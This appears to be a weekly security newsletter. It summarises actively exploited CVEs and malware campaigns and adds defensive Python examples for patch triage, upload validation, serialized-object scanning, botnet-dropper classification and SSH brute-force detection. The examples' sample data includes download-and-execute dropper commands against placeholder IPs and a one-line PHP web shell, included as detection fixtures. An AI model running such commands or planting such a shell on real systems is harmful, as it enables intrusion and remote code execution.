Executive Summary
This week saw significant cybersecurity developments, with both newly discovered and previously known critical vulnerabilities under active exploitation. Recent additions to the CISA KEV catalog include severe flaws in Apache Tomcat and CrushFTP, both actively targeted in the wild. WordPress plugins continue to pose a high risk, with critical issues in Bricks Builder, ValvePress Automatic, Startklar Elementor Addons, and the GiveWP Donation Plugin leading to remote code execution, SQL injection, and unauthorized access. a-blog cms is also being actively exploited through an untrusted data deserialization flaw affecting both supported and legacy versions. Immediate patching is strongly recommended across all impacted systems.
Meanwhile, botnet activity surged, as EnemyBot, Sysrv-K, Andoryu, and Androxgh0st targeted Cloud Gateway, GitLab, and PHP vulnerabilities, while Bashlite, BrickerBot, Tsunami, and Mirai ramped up attacks on IoT devices, particularly Eir D1000 modems.
CISA published an analysis of RESURGE, a newly discovered malware variant targeting Ivanti Connect Secure appliances, featuring persistence mechanisms, credential theft, and privilege escalation. Kaspersky exposed a state-sponsored cyber-espionage campaign dubbed Operation ForumTroll, which exploited a zero-day vulnerability in Google Chrome to deliver malware via phishing emails to Russian media and academic institutions. Trend Micro detailed another espionage operation by the Water Gamayun threat group, leveraging a flaw in the Microsoft Management Console (MMC) to deploy an advanced malware toolkit for data theft and long-term system compromise.
Meanwhile, Elastic Security Labs examined the OUTLAW Linux malware, which uses simple yet effective SSH brute-force attacks and persistence tactics to establish and grow a botnet. These developments highlight the continued advancement of attacker techniques and the urgent need for proactive patching, phishing mitigation, and comprehensive endpoint protection.
Trending / Critical Vulnerabilities
Current trending vulnerabilities offer insight into the latest emerging and widely discussed threats, helping defenders prioritise patching and make informed decisions.
CVE-2025-24813 is a critical path equivalence vulnerability in Apache Tomcat versions 11.0.0-M1 through 11.0.2, 10.1.0-M1 through 10.1.34, and 9.0.0.M1 through 9.0.98. The flaw stems from improper handling of file names containing an internal dot, which, under certain non-default configurations, can allow unauthenticated remote attackers to read sensitive files, inject malicious content, or execute arbitrary code. The remote code execution outcome requires writes to be enabled on the default servlet (readonly set to false, which is not the default), partial PUT support (enabled by default), file-based session persistence using the default storage location, and a deserialization gadget library on the application's classpath; the file read and injection outcomes require only the first two conditions. With a CVSS v3 base score of 9.8, this vulnerability is classified as critical. Public proof-of-concept exploits are available, and active exploitation has been observed in the wild, prompting its inclusion in CISA's Known Exploited Vulnerabilities (KEV) catalog. Administrators are strongly urged to upgrade to Apache Tomcat 11.0.3, 10.1.35, or 9.0.99 to mitigate the risk, and in the meantime to confirm that the default servlet is read-only.
CVE-2025-31161 is a critical authentication bypass vulnerability affecting CrushFTP versions 10.0.0 through 10.8.3 and 11.0.0 through 11.3.0, caused by improper handling of S3-style (AWS4-HMAC) authorization headers. The flaw allows remote, unauthenticated attackers to impersonate existing users, including administrators, and perform privileged actions such as data access and administrative operations. With a CVSS score of 9.8, the vulnerability is classified as critical. A public proof-of-concept (PoC) exploit is available, and active exploitation has been observed in the wild. Users are strongly urged to update to CrushFTP version 10.8.4 or 11.3.1.
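Both advisories above are stated as inclusive version ranges, and Tomcat's ranges start at milestone builds ("11.0.0-M1", "9.0.0.M1") that sort before the GA release of the same number, which naive string comparison gets wrong. The following is an added example, not code from the newsletter or from either vendor: a small inventory triage helper that encodes the ranges exactly as given in the two paragraphs and reports which hosts still need patching. Host names in the sample inventory are constructed.

```python
import re
from typing import Dict, List, Tuple

# Affected ranges as stated in the two advisories above (inclusive).
# Fixed releases: Tomcat 11.0.3 / 10.1.35 / 9.0.99, CrushFTP 10.8.4 / 11.3.1.
AFFECTED_RANGES: Dict[str, List[Tuple[str, str]]] = {
    "tomcat": [("11.0.0-M1", "11.0.2"), ("10.1.0-M1", "10.1.34"), ("9.0.0.M1", "9.0.98")],
    "crushftp": [("10.0.0", "10.8.3"), ("11.0.0", "11.3.0")],
}

# Accepts "9.0.98", "11.0.0-M1" and the older "9.0.0.M1" milestone spelling.
_VERSION_RE = re.compile(r"^(\d+)\.(\d+)\.(\d+)(?:[.-]M(\d+))?$")


def parse_version(text: str) -> Tuple[int, int, int, int, int]:
    """Turn a Tomcat/CrushFTP version string into a sortable tuple.

    Milestones must sort *before* the GA release with the same number, so the
    tuple ends in (0, n) for milestone Mn and in (1, 0) for a GA build.
    """
    m = _VERSION_RE.match(text.strip())
    if not m:
        raise ValueError(f"unrecognised version string: {text!r}")
    major, minor, patch, milestone = m.groups()
    if milestone is None:
        return (int(major), int(minor), int(patch), 1, 0)
    return (int(major), int(minor), int(patch), 0, int(milestone))


def is_affected(product: str, version: str) -> bool:
    """True if `version` of `product` lies inside one of the affected ranges."""
    v = parse_version(version)
    return any(parse_version(lo) <= v <= parse_version(hi)
               for lo, hi in AFFECTED_RANGES[product.lower()])


def triage(inventory: List[Tuple[str, str, str]]) -> List[str]:
    """Return the hosts from (host, product, version) rows that need patching."""
    return [host for host, product, version in inventory if is_affected(product, version)]


# Constructed sample inventory (hypothetical host names), not real telemetry.
SAMPLE_INVENTORY = [
    ("app-01", "tomcat", "9.0.98"),
    ("app-02", "tomcat", "9.0.99"),
    ("app-03", "tomcat", "11.0.0-M26"),
    ("ftp-01", "crushftp", "11.3.0"),
    ("ftp-02", "crushftp", "11.3.1"),
]

if __name__ == "__main__":
    for host in triage(SAMPLE_INVENTORY):
        print("PATCH NEEDED:", host)
```

The version string can be taken from the Tomcat `version.sh` output or the CrushFTP admin banner; the checker only answers the "is this build in the affected range" question, not whether the non-default Tomcat conditions for RCE are present, which has to be read from the default servlet configuration.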
A high-severity untrusted data deserialization vulnerability has been discovered in a-blog cms, a content management system developed by Appleple Inc. It allows attackers to upload arbitrary files to the server via specially crafted requests, potentially resulting in remote script execution and full server compromise. Assigned a CVSS v3 base score of 7.5, the vulnerability has been actively exploited in the wild, with attacks targeting versions 2.8.x and later. According to the developer, a-blog cms Ver.2.7 and earlier, which are now unsupported, are affected as well and will not receive a fix. The primary mitigation is to update a-blog cms to the latest patched release as advised by the developer; installations on unsupported versions should be migrated or taken offline.
CVE-2024-25600 is a critical unauthenticated remote code execution (RCE) vulnerability in the Bricks Builder theme for WordPress, affecting versions up to and including 1.9.6. The flaw allows attackers to execute arbitrary PHP code on the server without authentication, potentially leading to full site compromise. It has been assigned a CVSS v3 base score of 10.0. Public exploit code is available, and active exploitation has been observed in the wild. Administrators are strongly advised to update to version 1.9.6.1 or later to mitigate this issue.
CVE-2024-27956 is a critical SQL injection vulnerability in the ValvePress Automatic plugin for WordPress, affecting versions up to and including 3.92.0. The flaw allows unauthenticated attackers to execute arbitrary SQL queries, which can lead to unauthorized access, data exfiltration, or the creation of rogue administrator accounts. Assigned a CVSS v3.1 base score of 9.8, the vulnerability is classified as critical. Active exploitation has been reported in the wild, with attackers leveraging the flaw to compromise WordPress sites, and proof-of-concept (PoC) code is publicly available, further increasing the risk of widespread abuse. Users are strongly urged to upgrade to version 3.92.1 or later, which includes the necessary security patch.
A critical vulnerability in the Startklar Elementor Addons plugin for WordPress, affecting versions up to and including 1.7.13, arises from insufficient file type validation in the process function of the startklarDropZoneUploadProcess class, allowing unauthenticated attackers to upload arbitrary files to the server, potentially leading to remote code execution. The National Vulnerability Database (NVD) has assigned it a CVSS v3.1 base score of 9.8, classifying it as critical. Although no public proof-of-concept (PoC) is available, the vulnerability is reportedly being actively exploited in the wild. Users are strongly advised to update to version 1.7.14 or later to mitigate the risk.
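The Startklar flaw above is the classic arbitrary-upload pattern: the upload handler trusts the client-supplied file name and does not verify what the file actually is. The following added example (not the plugin's code, and written in Python rather than PHP purely for illustration) puts the weak pattern beside a hardened validator that enforces a single allow-listed extension, checks the file's magic bytes, and rejects path tricks. The function names and the allow-list are assumptions for the example.

```python
import os
from typing import Dict, Optional, Tuple

# Allow-listed extensions mapped to the magic bytes a genuine file of that type starts with.
ALLOWED_TYPES: Dict[str, Tuple[bytes, ...]] = {
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "pdf": (b"%PDF-",),
}


def vulnerable_accept(filename: str) -> bool:
    """The weak pattern: trust the client's name and only deny-list a couple of extensions.

    Anything the deny-list forgets (.phar, .phtml variants, .htaccess, a second
    extension, a path component) goes straight to disk.
    """
    return not filename.lower().endswith((".php", ".phtml"))


def hardened_accept(filename: str, content: bytes) -> Optional[str]:
    """Return the canonical extension if the upload is acceptable, otherwise None.

    - the name must be a bare file name: no directory separators, no NUL bytes
    - exactly one extension, taken from the allow-list (rejects 'shell.php.png')
    - the content must begin with the magic bytes expected for that extension
    """
    if "\x00" in filename or os.path.basename(filename) != filename:
        return None
    parts = filename.lower().split(".")
    if len(parts) != 2 or not parts[0]:          # also rejects dotfiles such as .htaccess
        return None
    ext = parts[1]
    magics = ALLOWED_TYPES.get(ext)
    if magics is None or not content.startswith(magics):
        return None
    return ext


# Constructed sample uploads for illustration.
PNG_HEADER = b"\x89PNG\r\n\x1a\n" + b"\x00" * 8
WEBSHELL = b"<?php system($_GET['c']); ?>"

if __name__ == "__main__":
    for name, body in [("avatar.png", PNG_HEADER), ("shell.phar", WEBSHELL),
                       ("shell.php.png", PNG_HEADER), ("avatar.png", WEBSHELL)]:
        print(f"{name:15} weak={vulnerable_accept(name)!s:5} hardened={hardened_accept(name, body)}")
```

On the server side the accepted extension, not the original name, should be used to build the stored path, and the upload directory should be served with script execution disabled so that a bypass of the validator still does not yield code execution.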
A critical code injection vulnerability affects the GiveWP – Donation Plugin and Fundraising Platform for WordPress in versions up to and including 3.16.1. The flaw arises from the deserialization of untrusted input supplied through parameters such as 'give_title' and 'card_address', allowing unauthenticated attackers to inject PHP objects. The presence of a Property-Oriented Programming (POP) chain in the plugin further enables attackers to delete arbitrary files and achieve remote code execution. The National Vulnerability Database (NVD) has assigned this vulnerability a CVSS v3.1 base score of 9.8, categorizing it as critical. Version 3.16.1 addressed the issue only partially; comprehensive hardening was implemented in version 3.16.2. Users are strongly advised to update to version 3.16.2 or later to mitigate this vulnerability.
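Both the a-blog cms flaw and the GiveWP flaw above are reached by placing a serialized PHP object in a request field that should only ever carry plain text. The following is an added example (not code from either project or from the newsletter) showing the detection side: a request-body scanner that finds `O:<len>:"<Class>":<n>:{` markers in form parameters, URL-decoded, and only reports a hit when the declared length matches the class name, which keeps free-text fields from producing false positives. The class name in the sample requests is a hypothetical placeholder, not a real gadget.

```python
import re
from typing import Dict, List
from urllib.parse import parse_qs, unquote_plus

# A serialized PHP object looks like  O:<len>:"<ClassName>":<nprops>:{...}
# Donation titles and card addresses never legitimately contain this.
_PHP_OBJECT_RE = re.compile(r'O:(\d+):"([A-Za-z0-9_\\]+)":\d+:\{')


def find_php_objects(value: str) -> List[str]:
    """Return the class names of serialized PHP objects embedded in one value.

    The value is URL-decoded once more in case it was double-encoded; the declared
    length has to equal the class-name length, which filters accidental matches.
    """
    text = unquote_plus(value)
    return [cls for length, cls in _PHP_OBJECT_RE.findall(text) if int(length) == len(cls)]


def scan_request(body: str) -> Dict[str, List[str]]:
    """Map every form parameter carrying a serialized PHP object to the classes found.

    `body` is the raw application/x-www-form-urlencoded request body.
    """
    findings: Dict[str, List[str]] = {}
    for name, values in parse_qs(body, keep_blank_values=True).items():
        classes = [cls for v in values for cls in find_php_objects(v)]
        if classes:
            findings[name] = classes
    return findings


# Constructed sample request bodies; "Hypothetical_Gadget" is a placeholder class name.
BENIGN_BODY = "give_title=Dr.&card_address=1+Main+St"
MALICIOUS_BODY = ('give_title=O:19:"Hypothetical_Gadget":1:{s:4:"path";s:14:"/tmp/some.file";}'
                  "&card_address=x")
ENCODED_BODY = "card_address=O%3A19%3A%22Hypothetical_Gadget%22%3A0%3A%7B%7D"

if __name__ == "__main__":
    for label, body in [("benign", BENIGN_BODY), ("malicious", MALICIOUS_BODY), ("encoded", ENCODED_BODY)]:
        print(label, "->", scan_request(body) or "clean")
```

The same check can run as a WAF rule or over access logs that record POST bodies; a hit on a parameter that should only contain text is a strong signal on its own, regardless of whether the class named is a known gadget.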
Exploit Activity and Mass Scanning Observed on Cytellite Sensors
Telemetry collected from Loginsoft sensors was analyzed and processed to derive insights into what is actively being exploited and actively being scanned. As the source of truth, source IPv4 addresses and payloads can be provided on a need-to-know basis.
Vulnerabilities Abused by Botnets
Identified vulnerabilities exploited by botnets, including recent CVEs logged in MISP. Presented here are the top 5 CVEs whose payloads are suggestive of botnet activity, such as fetching a binary with wget from a raw IP address.
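The classification rule described above (a payload counts as botnet-like when it fetches from a raw IP address) is easy to automate. The following is an added example, not the Cytellite sensor code: it URL-decodes a captured payload, looks for a fetch tool (wget, curl, tftp, ftpget) pointed at a raw IPv4 host within the same shell command, notes whether a chmod/sh execution step follows, and tallies the download hosts across a batch of payloads for blocking. The sample payloads are constructed and use RFC 5737 documentation addresses.

```python
import re
from collections import Counter
from typing import Dict, List, Optional
from urllib.parse import unquote_plus

# Fetch tool followed, within the same shell command, by a raw IPv4 host.
_FETCH_RE = re.compile(
    r"\b(wget|curl|tftp|ftpget)\b"              # download tool
    r"[^;|&\n]*?"                                # its flags, but do not cross ; | &
    r"(?:https?://)?\b((?:\d{1,3}\.){3}\d{1,3})\b"  # raw IPv4 target, no hostname
)
# Execution step that usually follows the download in IoT/Linux droppers.
_EXEC_RE = re.compile(r"chmod\s+(?:\+x|[0-7]{3,4})|\|\s*(?:ba)?sh\b|\bsh\s+\S|\./\S")


def classify_payload(payload: str) -> Optional[Dict[str, str]]:
    """Return {'tool','host','exec'} when the payload looks like a botnet dropper, else None."""
    text = unquote_plus(payload)
    m = _FETCH_RE.search(text)
    if not m:
        return None
    return {
        "tool": m.group(1),
        "host": m.group(2),
        "exec": "yes" if _EXEC_RE.search(text) else "no",
    }


def botnet_hosts(payloads: List[str]) -> Dict[str, int]:
    """Count how often each raw-IP download host appears across a batch of payloads."""
    counts: Counter = Counter()
    for payload in payloads:
        hit = classify_payload(payload)
        if hit:
            counts[hit["host"]] += 1
    return dict(counts)


# Constructed sample payloads as a sensor might capture them (documentation IPs only).
SAMPLE_PAYLOADS = [
    "cd /tmp; wget http://192.0.2.10/bins/x86; chmod +x x86; ./x86 gateway",
    "curl -s http://203.0.113.5/update.sh | sh",
    "GET /index.php?page=about",
    "wget https://example.com/file",                     # hostname, not a raw IP
    "cmd=cd+%2Ftmp%3Bwget+192.0.2.10%2Fbot.sh%3Bsh+bot.sh",  # URL-encoded in a query string
]

if __name__ == "__main__":
    for p in SAMPLE_PAYLOADS:
        print(classify_payload(p), "<-", p)
    print(botnet_hosts(SAMPLE_PAYLOADS))
```

The raw-IP heuristic deliberately ignores hostname URLs, since droppers that stage on throwaway VPS addresses rarely bother with DNS; the `exec` flag separates a download-and-run attempt from a bare fetch, which is the distinction that matters when deciding whether a sensor hit is exploitation or just scanning.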
Vulnerabilities Abused by Malware
We proactively monitor the vulnerabilities that are targeted by adversaries. Each vulnerability is manually studied and mapped to MITRE ATT&CK tactics and techniques. The information is derived from our vulnerability intelligence platform, which collects and curates data from sources such as Twitter, Telegram, OSINT groups, blogs, data leak sites and more.
The Cybersecurity and Infrastructure Security Agency (CISA) has released a Malware Analysis Report detailing a new malware variant, RESURGE, linked to the exploitation of CVE-2025-0282 in Ivanti Connect Secure appliances. RESURGE shares functionalities with the SPAWNCHIMERA malware, including persistence across reboots, but introduces unique commands that create web shells, manipulate integrity checks, and modify files. These capabilities enable credential harvesting, unauthorized account creation, password resets, and privilege escalation.
Kaspersky's Global Research and Analysis Team (GReAT) has uncovered a state-sponsored APT attack, dubbed Operation ForumTroll, which exploits a zero-day vulnerability, CVE-2025-2783, in Google Chrome to conduct cyber-espionage against Russian media professionals and academic institutions. The attack begins with phishing emails impersonating invitations to the Primakov Readings forum, containing malicious links that redirect victims to an attacker-controlled website. If a Windows user running Google Chrome or another Chromium-based browser clicks the link, malware is deployed automatically, requiring no further action from the victim. CVE-2025-2783, a logic flaw at the boundary between Chrome and the Windows operating system, allows the attackers to bypass Chrome's sandbox protection and execute code on the host. Kaspersky reported the flaw to Google, which swiftly released a patch. Given the highly targeted nature of the attack, organizations are urged to apply the latest Chrome security update immediately and strengthen their phishing defenses to mitigate the risk.
Trend Micro Research has uncovered a cyber-espionage campaign orchestrated by the Russian threat actor Water Gamayun (also known as EncryptHub and Larva-208), which exploits a zero-day vulnerability, CVE-2025-26633, in the Microsoft Management Console (MMC) framework to execute malicious code. Dubbed MSC EvilTwin, the technique manipulates .msc files and the Multilingual User Interface Path (MUIPath) to download and execute malicious payloads, establish persistence, and exfiltrate sensitive data from compromised systems. The vulnerability lets the attackers infiltrate target environments with a sophisticated arsenal of malware, including the EncryptHub stealer, the DarkWisp and SilentPrism backdoors, the MSC EvilTwin loader, and the Stealc and Rhadamanthys stealers.
The Elastic Security Labs blog post titled "Outlaw Linux Malware: Persistent, Unsophisticated, and Surprisingly Effective" examines OUTLAW, a persistent Linux-based malware that uses basic yet effective techniques to establish and maintain a botnet. The malware initiates attacks through SSH brute-force methods, targeting systems with weak credentials. Once access is gained, it deploys components such as a modified XMRig cryptocurrency miner, an IRC-based remote-control tool named STEALTH SHELLBOT, and a custom brute-force tool called BLITZ. OUTLAW ensures persistence by eliminating competing malware and establishing mechanisms such as SSH key manipulation and cron job scheduling. Additionally, it propagates by using compromised hosts to launch further SSH brute-force attacks within local subnets.
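Because OUTLAW's initial access and its lateral spread are both plain SSH password guessing, the highest-value detection is an sshd log check that flags a source exceeding a failure threshold within a short window, and then escalates if that same source later logs in successfully. The following is an added example (not Elastic's code and not part of the original post) implementing that check over syslog-format sshd lines; the log lines are constructed with RFC 5737 documentation addresses, and the threshold and window are assumptions to tune per environment.

```python
import re
from collections import defaultdict, deque
from datetime import datetime
from typing import Deque, Dict, List, Optional, Tuple

# Standard syslog-format sshd lines (Debian/Ubuntu auth.log, RHEL /var/log/secure).
_SSHD_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?:password|publickey) for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>\d{1,3}(?:\.\d{1,3}){3}) port \d+"
)


def parse_sshd_line(line: str, year: int) -> Optional[Tuple[datetime, str, str, str]]:
    """Return (timestamp, 'Failed'|'Accepted', user, source_ip) or None for other lines.

    Syslog timestamps carry no year, so the caller supplies it.
    """
    m = _SSHD_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return ts, m["result"], m["user"], m["ip"]


def detect_bruteforce(lines: List[str], threshold: int = 5, window_s: int = 60,
                      year: int = 2025) -> List[str]:
    """Flag sources with >= `threshold` failures inside `window_s` seconds, then flag
    any later successful login from a flagged source as a probable compromise."""
    failures: Dict[str, Deque[datetime]] = defaultdict(deque)
    flagged: Dict[str, int] = {}
    alerts: List[str] = []
    for line in lines:
        parsed = parse_sshd_line(line, year)
        if parsed is None:
            continue
        ts, result, user, ip = parsed
        if result == "Failed":
            window = failures[ip]
            window.append(ts)
            while (ts - window[0]).total_seconds() > window_s:   # slide the window
                window.popleft()
            if len(window) >= threshold and ip not in flagged:
                flagged[ip] = len(window)
                alerts.append(f"BRUTE_FORCE {ip} {len(window)} failures within {window_s}s")
        elif result == "Accepted" and ip in flagged:
            alerts.append(f"BRUTE_FORCE_SUCCESS {ip} logged in as {user}")
    return alerts


# Constructed sample auth.log excerpt: one guessing source that eventually gets in,
# one stray failure, and one legitimate key-based login.
SAMPLE_AUTH_LOG = [
    "Mar 30 10:15:01 web1 sshd[2101]: Failed password for root from 198.51.100.7 port 51234 ssh2",
    "Mar 30 10:15:03 web1 sshd[2103]: Failed password for invalid user admin from 198.51.100.7 port 51236 ssh2",
    "Mar 30 10:15:05 web1 sshd[2105]: Accepted publickey for deploy from 203.0.113.9 port 40022 ssh2",
    "Mar 30 10:15:06 web1 sshd[2107]: Failed password for root from 198.51.100.7 port 51240 ssh2",
    "Mar 30 10:15:08 web1 sshd[2109]: Failed password for invalid user oracle from 198.51.100.7 port 51242 ssh2",
    "Mar 30 10:15:10 web1 sshd[2111]: Failed password for root from 192.0.2.44 port 33001 ssh2",
    "Mar 30 10:15:11 web1 sshd[2113]: Failed password for root from 198.51.100.7 port 51244 ssh2",
    "Mar 30 10:15:20 web1 sshd[2120]: Accepted password for root from 198.51.100.7 port 51300 ssh2",
]

if __name__ == "__main__":
    for alert in detect_bruteforce(SAMPLE_AUTH_LOG):
        print(alert)
```

A BRUTE_FORCE_SUCCESS alert is the point at which the host should be treated as compromised rather than merely probed: the follow-up checks that the post describes (new entries in authorized_keys, new cron jobs, an XMRig process) belong in the response playbook for that alert rather than in the log rule itself.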